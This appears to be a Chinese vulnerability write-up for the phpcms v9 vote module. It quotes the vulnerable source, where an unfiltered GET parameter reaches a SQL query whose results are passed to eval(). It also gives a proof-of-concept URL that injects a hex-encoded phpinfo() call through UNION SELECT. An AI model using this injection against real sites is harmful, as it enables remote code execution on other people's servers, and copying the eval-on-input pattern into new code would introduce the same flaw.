phpcms v9 后台的一个(sql injet)2(code exec)漏洞 - 脚本漏洞

以下是引用片段：

function string2array($data) {
    if($data == '') return array();
    eval("\$array = $data;");
    return $array;
}

以下是引用片段：

/moudles/vote/vote.php
/**
     * 投票结果统计
     */
    public function statistics() {
            $subjectid = $_GET['subjectid'];
            $show_validator = $show_scroll = $show_header = true;
             //获取投票信息
            $sdb = pc_base::load_model('vote_data_model'); //加载投票统计的数据模型
            $infos = $sdb->select("subjectid = $subjectid",'data');    //$subjectid没有过滤
              //新建一数组用来存新组合数据
            $total = 0;
            $vote_data =array();
            $vote_data['total'] = 0 ;//所有投票选项总数
            $vote_data['votes'] = 0 ;//投票人数
            //循环每个会员的投票记录
            foreach($infos as $subjectid_arr) {//通过sql注入漏洞控制结果
                    extract($subjectid_arr);
                     $arr = string2array($data);//进入eval函数
                     foreach($arr as $key => $values){
                         $vote_data[$key]+=1;
                    }
                      $total += array_sum($arr);
                    $vote_data['votes']++ ;
            }
             $vote_data['total'] = $total ;
             //取投票选项
            $options = $this->db2->get_options($subjectid);   
            include $this->admin_tpl('vote_statistics');   
    }

Poc 代码：

index.php?m=vote&c=vote&a=statistics&show_type=1&subjectid=0 union select 0x706870696E666F2829/*&siteid=1&pc_hash=LFeCIl

pc_hash 每次不一样。